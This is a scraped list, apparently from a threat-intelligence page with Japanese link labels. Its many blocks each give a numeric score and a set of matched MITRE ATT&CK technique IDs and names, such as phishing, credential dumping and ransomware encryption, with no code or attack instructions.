- T1657 - Financial Theft
- T1588.002 - Tool
- T1566 - Phishing
- T1562.001 - Disable or Modify Tools
- T1078 - Valid Accounts
- T1486 - Data Encrypted for Impact
- T1570 - Lateral Tool Transfer
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1569.002 - Service Execution
MITREへのリンク →
Score: 23.39
Matched TTPs:
- T1560.001 - Archive via Utility
- T1558 - Steal or Forge Kerberos Tickets
- T1219 - Remote Access Tools
- T1657 - Financial Theft
- T1059.001 - PowerShell
- T1562.001 - Disable or Modify Tools
- T1078 - Valid Accounts
- T1531 - Account Access Removal
- T1486 - Data Encrypted for Impact
- T1021.001 - Remote Desktop Protocol
MITREへのリンク →
Score: 27.92
Matched TTPs:
- T1047 - Windows Management Instrumentation
- T1080 - Taint Shared Content
- T1543.003 - Windows Service
- T1574.001 - DLL
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1021.002 - SMB/Windows Admin Shares
- T1090 - Proxy
- T1657 - Financial Theft
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1078.002 - Domain Accounts
- T1059.006 - Python
- T1059.003 - Windows Command Shell
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 69.83
Matched TTPs:
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1548.002 - Bypass User Account Control
- T1543.003 - Windows Service
- T1559.001 - Component Object Model
- T1106 - Native API
- T1190 - Exploit Public-Facing Application
- T1219 - Remote Access Tools
- T1608.002 - Upload Tool
- T1562.004 - Disable or Modify System Firewall
- T1112 - Modify Registry
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1657 - Financial Theft
- T1583.006 - Web Services
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1078 - Valid Accounts
- T1486 - Data Encrypted for Impact
- T1570 - Lateral Tool Transfer
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1650 - Acquire Access
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1569.002 - Service Execution
- T1529 - System Shutdown/Reboot
- T1218.014 - MMC
MITREへのリンク →
Score: 60.25
Matched TTPs:
- T1047 - Windows Management Instrumentation
- T1003 - OS Credential Dumping
- T1584.008 - Network Devices
- T1559.002 - Dynamic Data Exchange
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1547.009 - Shortcut Modification
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1102.003 - One-Way Communication
- T1534 - Internal Spearphishing
- T1547.001 - Registry Run Keys / Startup Folder
- T1078 - Valid Accounts
- T1218.010 - Regsvr32
- T1587.004 - Exploits
- T1589.001 - Credentials
- T1203 - Exploitation for Client Execution
- T1027.003 - Steganography
- T1197 - BITS Jobs
- T1189 - Drive-by Compromise
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
MITREへのリンク →
Score: 26.54
Matched TTPs:
- T1047 - Windows Management Instrumentation
- T1574.001 - DLL
- T1040 - Network Sniffing
- T1055 - Process Injection
- T1021.002 - SMB/Windows Admin Shares
- T1562.004 - Disable or Modify System Firewall
- T1562.001 - Disable or Modify Tools
- T1570 - Lateral Tool Transfer
- T1569.002 - Service Execution
- T1090.001 - Internal Proxy
- T1211 - Exploitation for Defense Evasion
MITREへのリンク →
Score: 30.88
Matched TTPs:
- T1047 - Windows Management Instrumentation
- T1587.001 - Malware
- T1204.002 - Malicious File
- T1007 - System Service Discovery
- T1112 - Modify Registry
- T1003.001 - LSASS Memory
- T1552.001 - Credentials In Files
- T1059.001 - PowerShell
- T1562.001 - Disable or Modify Tools
- T1078 - Valid Accounts
- T1486 - Data Encrypted for Impact
- T1012 - Query Registry
- T1078.002 - Domain Accounts
- T1059.003 - Windows Command Shell
- T1136 - Create Account
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
MITREへのリンク →
Score: 25.72
Matched TTPs:
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1036 - Masquerading
- T1057 - Process Discovery
- T1547.001 - Registry Run Keys / Startup Folder
- T1027 - Obfuscated Files or Information
- T1518.001 - Security Software Discovery
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1518 - Software Discovery
- T1105 - Ingress Tool Transfer
- T1566.003 - Spearphishing via Service
MITREへのリンク →
Score: 13.59
Matched TTPs:
- T1047 - Windows Management Instrumentation
- T1021.002 - SMB/Windows Admin Shares
- T1505.003 - Web Shell
- T1546.008 - Accessibility Features
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1218.010 - Regsvr32
MITREへのリンク →
Score: 58.98
Matched TTPs:
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1056.001 - Keylogging
- T1548.002 - Bypass User Account Control
- T1003.002 - Security Account Manager
- T1003.004 - LSA Secrets
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1608.004 - Drive-by Target
- T1140 - Deobfuscate/Decode Files or Information
- T1608.001 - Upload Malware
- T1190 - Exploit Public-Facing Application
- T1608.002 - Upload Tool
- T1112 - Modify Registry
- T1505.003 - Web Shell
- T1021.006 - Windows Remote Management
- T1003.001 - LSASS Memory
- T1059.001 - PowerShell
- T1210 - Exploitation of Remote Services
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1195.002 - Compromise Software Supply Chain
- T1203 - Exploitation for Client Execution
- T1012 - Query Registry
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 9.97
Matched TTPs:
- T1113 - Screen Capture
- T1659 - Content Injection
- T1090 - Proxy
- T1059.001 - PowerShell
MITREへのリンク →
Score: 15.23
Matched TTPs:
- T1113 - Screen Capture
- T1190 - Exploit Public-Facing Application
- T1219 - Remote Access Tools
- T1059.001 - PowerShell
- T1566 - Phishing
- T1195.002 - Compromise Software Supply Chain
- T1027.010 - Command Obfuscation
MITREへのリンク →
Score: 5.60
Matched TTPs:
- T1113 - Screen Capture
- T1056.001 - Keylogging
- T1070.004 - File Deletion
MITREへのリンク →
Score: 14.15
Matched TTPs:
- T1113 - Screen Capture
- T1204.002 - Malicious File
- T1547.001 - Registry Run Keys / Startup Folder
- T1218.001 - Compiled HTML File
- T1059.003 - Windows Command Shell
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1566.003 - Spearphishing via Service
MITREへのリンク →
Score: 24.99
Matched TTPs:
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1140 - Deobfuscate/Decode Files or Information
- T1112 - Modify Registry
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1218.010 - Regsvr32
- T1027.010 - Command Obfuscation
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
MITREへのリンク →
Score: 39.22
Matched TTPs:
- T1033 - System Owner/User Discovery
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1106 - Native API
- T1091 - Replication Through Removable Media
- T1140 - Deobfuscate/Decode Files or Information
- T1505.003 - Web Shell
- T1547.004 - Winlogon Helper DLL
- T1057 - Process Discovery
- T1547.001 - Registry Run Keys / Startup Folder
- T1573 - Encrypted Channel
- T1203 - Exploitation for Client Execution
- T1027.003 - Steganography
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1518 - Software Discovery
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 39.66
Matched TTPs:
- T1033 - System Owner/User Discovery
- T1584.008 - Network Devices
- T1566.002 - Spearphishing Link
- T1598.003 - Spearphishing Link
- T1218.007 - Msiexec
- T1140 - Deobfuscate/Decode Files or Information
- T1036 - Masquerading
- T1555.003 - Credentials from Web Browsers
- T1583.006 - Web Services
- T1041 - Exfiltration Over C2 Channel
- T1547.001 - Registry Run Keys / Startup Folder
- T1102.002 - Bidirectional Communication
- T1012 - Query Registry
- T1059.006 - Python
- T1598 - Phishing for Information
- T1059.003 - Windows Command Shell
- T1105 - Ingress Tool Transfer
- T1665 - Hide Infrastructure
MITREへのリンク →
Score: 37.26
Matched TTPs:
- T1033 - System Owner/User Discovery
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1574.001 - DLL
- T1140 - Deobfuscate/Decode Files or Information
- T1036 - Masquerading
- T1021.002 - SMB/Windows Admin Shares
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1486 - Data Encrypted for Impact
- T1056 - Input Capture
- T1566.004 - Spearphishing Voice
- T1570 - Lateral Tool Transfer
- T1656 - Impersonation
- T1059.003 - Windows Command Shell
- T1219.002 - Remote Desktop Software
- T1105 - Ingress Tool Transfer
- T1566.003 - Spearphishing via Service
MITREへのリンク →
Score: 32.47
Matched TTPs:
- T1033 - System Owner/User Discovery
- T1559.002 - Dynamic Data Exchange
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1598.003 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1218.005 - Mshta
- T1598.002 - Spearphishing Attachment
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1203 - Exploitation for Client Execution
- T1518.001 - Security Software Discovery
- T1027.010 - Command Obfuscation
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1518 - Software Discovery
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 13.47
Matched TTPs:
- T1218.011 - Rundll32
- T1543.003 - Windows Service
- T1219 - Remote Access Tools
- T1562.004 - Disable or Modify System Firewall
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1102.002 - Bidirectional Communication
MITREへのリンク →
Score: 21.21
Matched TTPs:
- T1218.011 - Rundll32
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1036 - Masquerading
- T1589.002 - Email Addresses
- T1218.005 - Mshta
- T1218.010 - Regsvr32
- T1027.003 - Steganography
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 43.87
Matched TTPs:
- T1218.011 - Rundll32
- T1559.002 - Dynamic Data Exchange
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1218.007 - Msiexec
- T1106 - Native API
- T1140 - Deobfuscate/Decode Files or Information
- T1608.001 - Upload Malware
- T1112 - Modify Registry
- T1555.003 - Credentials from Web Browsers
- T1588.001 - Malware
- T1553.005 - Mark-of-the-Web Bypass
- T1552.001 - Credentials In Files
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1486 - Data Encrypted for Impact
- T1078.002 - Domain Accounts
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 25.54
Matched TTPs:
- T1218.011 - Rundll32
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1608.001 - Upload Malware
- T1036 - Masquerading
- T1588.001 - Malware
- T1102 - Web Service
- T1218.005 - Mshta
- T1583.006 - Web Services
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 6.25
Matched TTPs:
- T1027.009 - Embedded Payloads
- T1566.002 - Spearphishing Link
- T1059.003 - Windows Command Shell
MITREへのリンク →
Score: 8.95
Matched TTPs:
- T1056.001 - Keylogging
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1555.003 - Credentials from Web Browsers
- T1105 - Ingress Tool Transfer
- T1566.003 - Spearphishing via Service
MITREへのリンク →
Score: 32.67
Matched TTPs:
- T1056.001 - Keylogging
- T1204.002 - Malicious File
- T1080 - Taint Shared Content
- T1497.001 - System Checks
- T1566.001 - Spearphishing Attachment
- T1091 - Replication Through Removable Media
- T1140 - Deobfuscate/Decode Files or Information
- T1497 - Virtualization/Sandbox Evasion
- T1057 - Process Discovery
- T1497.002 - User Activity Based Checks
- T1547.001 - Registry Run Keys / Startup Folder
- T1203 - Exploitation for Client Execution
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1189 - Drive-by Compromise
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 20.59
Matched TTPs:
- T1056.001 - Keylogging
- T1003 - OS Credential Dumping
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1505.003 - Web Shell
- T1090.002 - External Proxy
- T1059.001 - PowerShell
- T1210 - Exploitation of Remote Services
- T1203 - Exploitation for Client Execution
- T1059.006 - Python
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 16.79
Matched TTPs:
- T1056.001 - Keylogging
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1036 - Masquerading
- T1055 - Process Injection
- T1003.001 - LSASS Memory
- T1189 - Drive-by Compromise
- T1105 - Ingress Tool Transfer
- T1056.004 - Credential API Hooking
MITREへのリンク →
Score: 13.19
Matched TTPs:
- T1056.001 - Keylogging
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1056.002 - GUI Input Capture
- T1078 - Valid Accounts
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
MITREへのリンク →
Score: 7.43
Matched TTPs:
- T1003 - OS Credential Dumping
- T1007 - System Service Discovery
- T1057 - Process Discovery
- T1059.001 - PowerShell
MITREへのリンク →
Score: 4.97
Matched TTPs:
- T1003 - OS Credential Dumping
- T1078 - Valid Accounts
- T1059.003 - Windows Command Shell
MITREへのリンク →
Score: 40.57
Matched TTPs:
- T1003 - OS Credential Dumping
- T1583.002 - DNS Server
- T1190 - Exploit Public-Facing Application
- T1546.008 - Accessibility Features
- T1583.003 - Virtual Private Server
- T1584.005 - Botnet
- T1566 - Phishing
- T1078 - Valid Accounts
- T1553 - Subvert Trust Controls
- T1203 - Exploitation for Client Execution
- T1189 - Drive-by Compromise
- T1563.002 - RDP Hijacking
- T1021.001 - Remote Desktop Protocol
- T1001.002 - Steganography
MITREへのリンク →
Score: 80.37
Matched TTPs:
- T1006 - Direct Volume Access
- T1539 - Steal Web Session Cookie
- T1484.002 - Trust Modification
- T1598.003 - Spearphishing Link
- T1070.008 - Clear Mailbox Data
- T1552.004 - Private Keys
- T1598.004 - Spearphishing Voice
- T1087 - Account Discovery
- T1090 - Proxy
- T1588.001 - Malware
- T1552.001 - Credentials In Files
- T1657 - Financial Theft
- T1204 - User Execution
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1078 - Valid Accounts
- T1486 - Data Encrypted for Impact
- T1656 - Impersonation
- T1598 - Phishing for Information
- T1213.003 - Code Repositories
- T1219.002 - Remote Desktop Software
- T1136 - Create Account
- T1538 - Cloud Service Dashboard
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1213.005 - Messaging Applications
MITREへのリンク →
Score: 66.32
Matched TTPs:
- T1588.007 - Artificial Intelligence
- T1587.001 - Malware
- T1204.002 - Malicious File
- T1608.001 - Upload Malware
- T1036 - Masquerading
- T1071.003 - Mail Protocols
- T1681 - Search Threat Vendor Data
- T1090 - Proxy
- T1583.003 - Virtual Private Server
- T1497 - Virtualization/Sandbox Evasion
- T1657 - Financial Theft
- T1583.006 - Web Services
- T1041 - Exfiltration Over C2 Channel
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1656 - Impersonation
- T1059.006 - Python
- T1543.001 - Launch Agent
- T1059.003 - Windows Command Shell
- T1219.002 - Remote Desktop Software
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1059.005 - Visual Basic
- T1204.004 - Malicious Copy and Paste
- T1566.003 - Spearphishing via Service
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
MITREへのリンク →
Score: 20.15
Matched TTPs:
- T1539 - Steal Web Session Cookie
- T1548.002 - Bypass User Account Control
- T1497.001 - System Checks
- T1566.002 - Spearphishing Link
- T1574.001 - DLL
- T1555 - Credentials from Password Stores
- T1219.002 - Remote Desktop Software
- T1070.004 - File Deletion
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 19.56
Matched TTPs:
- T1539 - Steal Web Session Cookie
- T1204.002 - Malicious File
- T1598.003 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1608.001 - Upload Malware
- T1598.002 - Spearphishing Attachment
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1550.004 - Web Session Cookie
MITREへのリンク →
Score: 16.82
Matched TTPs:
- T1583.008 - Malvertising
- T1566.002 - Spearphishing Link
- T1608.004 - Drive-by Target
- T1608.001 - Upload Malware
- T1583.004 - Server
- T1189 - Drive-by Compromise
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 20.56
Matched TTPs:
- T1003.004 - LSA Secrets
- T1555 - Credentials from Password Stores
- T1555.003 - Credentials from Web Browsers
- T1003.001 - LSASS Memory
- T1055.013 - Process Doppelgänging
- T1552.001 - Credentials In Files
- T1588.002 - Tool
- T1027.010 - Command Obfuscation
- T1189 - Drive-by Compromise
MITREへのリンク →
Score: 20.92
Matched TTPs:
- T1587.001 - Malware
- T1040 - Network Sniffing
- T1190 - Exploit Public-Facing Application
- T1602.002 - Network Device Configuration Dump
- T1562.004 - Disable or Modify System Firewall
- T1588.002 - Tool
- T1136 - Create Account
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
MITREへのリンク →
Score: 12.68
Matched TTPs:
- T1587.001 - Malware
- T1204.002 - Malicious File
- T1091 - Replication Through Removable Media
- T1036 - Masquerading
- T1588.002 - Tool
- T1203 - Exploitation for Client Execution
- T1570 - Lateral Tool Transfer
MITREへのリンク →
Score: 4.41
Matched TTPs:
- T1587.001 - Malware
- T1003.001 - LSASS Memory
- T1588.002 - Tool
MITREへのリンク →
Score: 11.23
Matched TTPs:
- T1587.001 - Malware
- T1190 - Exploit Public-Facing Application
- T1021.002 - SMB/Windows Admin Shares
- T1562.004 - Disable or Modify System Firewall
- T1505.003 - Web Shell
- T1588.002 - Tool
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 53.87
Matched TTPs:
- T1587.001 - Malware
- T1543.003 - Windows Service
- T1007 - System Service Discovery
- T1140 - Deobfuscate/Decode Files or Information
- T1608.001 - Upload Malware
- T1219 - Remote Access Tools
- T1036 - Masquerading
- T1562.004 - Disable or Modify System Firewall
- T1059.009 - Cloud API
- T1610 - Deploy Container
- T1552.004 - Private Keys
- T1102 - Web Service
- T1552.001 - Credentials In Files
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1048 - Exfiltration Over Alternative Protocol
- T1562.001 - Disable or Modify Tools
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1595.001 - Scanning IP Blocks
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 17.40
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1140 - Deobfuscate/Decode Files or Information
- T1555 - Credentials from Password Stores
- T1555.003 - Credentials from Web Browsers
- T1657 - Financial Theft
- T1614.001 - System Language Discovery
- T1518.001 - Security Software Discovery
- T1059.005 - Visual Basic
MITREへのリンク →
Score: 5.55
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1102.002 - Bidirectional Communication
- T1203 - Exploitation for Client Execution
MITREへのリンク →
Score: 7.15
Matched TTPs:
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1203 - Exploitation for Client Execution
- T1189 - Drive-by Compromise
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 10.80
Matched TTPs:
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1608.004 - Drive-by Target
- T1203 - Exploitation for Client Execution
- T1189 - Drive-by Compromise
- T1059.005 - Visual Basic
MITREへのリンク →
Score: 10.99
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1140 - Deobfuscate/Decode Files or Information
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1218.010 - Regsvr32
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 12.58
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1547.001 - Registry Run Keys / Startup Folder
- T1219.002 - Remote Desktop Software
- T1189 - Drive-by Compromise
- T1102.001 - Dead Drop Resolver
MITREへのリンク →
Score: 25.41
Matched TTPs:
- T1204.002 - Malicious File
- T1598.003 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1608.004 - Drive-by Target
- T1505.003 - Web Shell
- T1583.004 - Server
- T1583.003 - Virtual Private Server
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1584.006 - Web Services
- T1189 - Drive-by Compromise
- T1566.003 - Spearphishing via Service
MITREへのリンク →
Score: 3.31
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1059.001 - PowerShell
- T1588.002 - Tool
MITREへのリンク →
Score: 5.69
Matched TTPs:
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1547.001 - Registry Run Keys / Startup Folder
- T1189 - Drive-by Compromise
MITREへのリンク →
Score: 22.53
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1555.003 - Credentials from Web Browsers
- T1102 - Web Service
- T1218.005 - Mshta
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1218.010 - Regsvr32
- T1203 - Exploitation for Client Execution
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1518 - Software Discovery
MITREへのリンク →
Score: 14.15
Matched TTPs:
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1608.001 - Upload Malware
- T1589.002 - Email Addresses
- T1102 - Web Service
- T1203 - Exploitation for Client Execution
- T1566.003 - Spearphishing via Service
MITREへのリンク →
Score: 24.27
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1608.001 - Upload Malware
- T1112 - Modify Registry
- T1589.002 - Email Addresses
- T1059 - Command and Scripting Interpreter
- T1497 - Virtualization/Sandbox Evasion
- T1583.006 - Web Services
- T1059.001 - PowerShell
- T1562.001 - Disable or Modify Tools
- T1203 - Exploitation for Client Execution
- T1656 - Impersonation
- T1059.003 - Windows Command Shell
MITREへのリンク →
Score: 7.96
Matched TTPs:
- T1204.002 - Malicious File
- T1574.001 - DLL
- T1003.001 - LSASS Memory
- T1059 - Command and Scripting Interpreter
- T1588.002 - Tool
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 5.36
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1059.001 - PowerShell
- T1203 - Exploitation for Client Execution
- T1059.005 - Visual Basic
MITREへのリンク →
Score: 6.38
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1036 - Masquerading
- T1059.001 - PowerShell
- T1059.003 - Windows Command Shell
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 22.89
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1106 - Native API
- T1140 - Deobfuscate/Decode Files or Information
- T1547.009 - Shortcut Modification
- T1112 - Modify Registry
- T1055.002 - Portable Executable Injection
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1059.003 - Windows Command Shell
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 20.44
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1106 - Native API
- T1608.001 - Upload Malware
- T1218.005 - Mshta
- T1598.002 - Spearphishing Attachment
- T1518.001 - Security Software Discovery
- T1059.005 - Visual Basic
- T1518 - Software Discovery
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 3.11
Matched TTPs:
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
MITREへのリンク →
Score: 16.55
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1588.001 - Malware
- T1057 - Process Discovery
- T1592.002 - Software
- T1203 - Exploitation for Client Execution
- T1027.003 - Steganography
- T1189 - Drive-by Compromise
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 6.63
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1007 - System Service Discovery
- T1203 - Exploitation for Client Execution
- T1059.003 - Windows Command Shell
MITREへのリンク →
Score: 6.44
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1203 - Exploitation for Client Execution
- T1518.001 - Security Software Discovery
- T1070.004 - File Deletion
MITREへのリンク →
Score: 5.30
Matched TTPs:
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1583.006 - Web Services
- T1588.002 - Tool
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 10.94
Matched TTPs:
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1106 - Native API
- T1190 - Exploit Public-Facing Application
- T1588.002 - Tool
- T1203 - Exploitation for Client Execution
MITREへのリンク →
Score: 9.21
Matched TTPs:
- T1543.003 - Windows Service
- T1040 - Network Sniffing
- T1219 - Remote Access Tools
- T1059.001 - PowerShell
- T1588.002 - Tool
MITREへのリンク →
Score: 11.10
Matched TTPs:
- T1598.003 - Spearphishing Link
- T1589.002 - Email Addresses
- T1608.005 - Link Target
- T1588.002 - Tool
- T1078 - Valid Accounts
MITREへのリンク →
Score: 11.34
Matched TTPs:
- T1574.001 - DLL
- T1190 - Exploit Public-Facing Application
- T1505.003 - Web Shell
- T1588.001 - Malware
- T1588.002 - Tool
- T1027 - Obfuscated Files or Information
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 7.06
Matched TTPs:
- T1556.002 - Password Filter DLL
- T1090.001 - Internal Proxy
MITREへのリンク →
Score: 36.77
Matched TTPs:
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1562.004 - Disable or Modify System Firewall
- T1552.004 - Private Keys
- T1055.002 - Portable Executable Injection
- T1102 - Web Service
- T1057 - Process Discovery
- T1547.001 - Registry Run Keys / Startup Folder
- T1562.001 - Disable or Modify Tools
- T1027 - Obfuscated Files or Information
- T1027.004 - Compile After Delivery
- T1518.001 - Security Software Discovery
- T1059.006 - Python
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
- T1102.001 - Dead Drop Resolver
MITREへのリンク →
Score: 8.14
Matched TTPs:
- T1190 - Exploit Public-Facing Application
- T1505.003 - Web Shell
- T1595.003 - Wordlist Scanning
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 5.18
Matched TTPs:
- T1021.002 - SMB/Windows Admin Shares
- T1078.002 - Domain Accounts
- T1059.003 - Windows Command Shell
MITREへのリンク →
Score: 3.12
Matched TTPs:
- T1021.002 - SMB/Windows Admin Shares
- T1071.001 - Web Protocols
MITREへのリンク →
Score: 10.62
Matched TTPs:
- T1071.003 - Mail Protocols
- T1657 - Financial Theft
- T1071.002 - File Transfer Protocols
- T1071.001 - Web Protocols
MITREへのリンク →
Score: 40.73
Matched TTPs:
- T1555.003 - Credentials from Web Browsers
- T1589.002 - Email Addresses
- T1598.004 - Spearphishing Voice
- T1090 - Proxy
- T1588.001 - Malware
- T1583.003 - Virtual Private Server
- T1204 - User Execution
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1531 - Account Access Removal
- T1589.001 - Credentials
- T1656 - Impersonation
- T1213.003 - Code Repositories
- T1213.005 - Messaging Applications
MITREへのリンク →
Score: 8.74
Matched TTPs:
- T1090.002 - External Proxy
- T1059 - Command and Scripting Interpreter
- T1588.002 - Tool
